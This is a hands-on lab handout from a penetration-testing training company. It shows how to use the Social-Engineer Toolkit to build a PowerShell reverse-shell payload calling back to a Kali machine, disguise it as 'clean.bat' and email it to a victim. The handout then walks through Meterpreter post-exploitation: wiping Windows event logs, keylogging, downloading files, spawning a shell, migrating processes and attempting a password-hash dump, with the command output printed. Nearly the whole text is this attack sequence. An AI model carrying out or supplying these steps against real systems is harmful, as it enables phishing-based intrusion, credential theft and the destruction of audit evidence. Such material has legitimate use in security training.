NEXUS EDUCATION SERVICES

📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net

This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines

Social Engineering Penetration Testing using PowerShell Attack

As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools to
perform a penetration testing

HANDS-ON LAB:

Lab Objectives:

Lab Duration:
▪ Time: 45 minutes

Lab Environment
▪ You need internet connection

Lab Tasks

Tools

Step-by-Steps Instructions

Open a new Terminal and run SET

setoolkit
1) Social-Engineering Attacks

9) Powershell Attack Vectors

1) Powershell Alphanumeric Shellcode Injector

enter the ip ok Kali 192.168.145.130

accept 443 press enter

type yes

! open a new term and look for the powershell injection file

ls /root/.set/reports/powershell and you will see a file call x86_powershell_injection.txt

cp /root/.set/reports/powershell/ Desktop

rename x86_powershell_injection.txt to clean.bat and send it to the victim via email

1 I have copied the file already to windows server 2012 desktop, just run clean.bat

Go back to the Kali with meterpreter open and type sessions -i 1

msf5 exploit(multi/handler) > sessions -i 1

1
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net

This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines

[*] Starting interaction with 1...

Type sysinfo

meterpreter > sysinfo

Computer : NEXUSSERVER
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows

type ? to see all commands available

Go to windows and type eventvwr check to see that the windows logs has thousands of event log which is about to
disappear

go back to Kali and type clearev

meterpreter > clearev

[*] Wiping 1612 records from Application...
[*] Wiping 3201 records from System...
[*] Wiping 9106 records from Security...

execute -f calc

! Start capturing keystrokes

keyscan_start

! Dump the keystroke buffer and you will see all the keystroke from server 2012
keyscan_dump

! Stop keylogger
keyscan_stop

! go to Windows dir and you will see that you have gained access to windows servers drive c:
cd c:\windows
pwd
ls

! Download a file from victims PC to your Kali

pwd
cd C:\Users\Administrator\pictures
download cat.jpg

meterpreter > shell

Process 452 created.

2
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net

This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines

Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

meterpreter > execute -f cmd.exe -i -H

Process 3708 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Downloads>ps

meterpreter > run post/windows/manage/migrate

[*] Running module against NEXUSSERVER

[*] Current server process: powershell.exe (2844)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4068
[+] Successfully migrated to process 4068

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...

[*] Calculating the hboot key using SYSKEY f93580f87e94025a7a009eb1886569f1...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed:
Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

Result of penetration testing: by now you should know how attacker send keylogger and gather the username
and password to be used for remote connection to gain root access

Question: As a Nexus Ethical Hacker what should you do to protect your company from Powershell Attack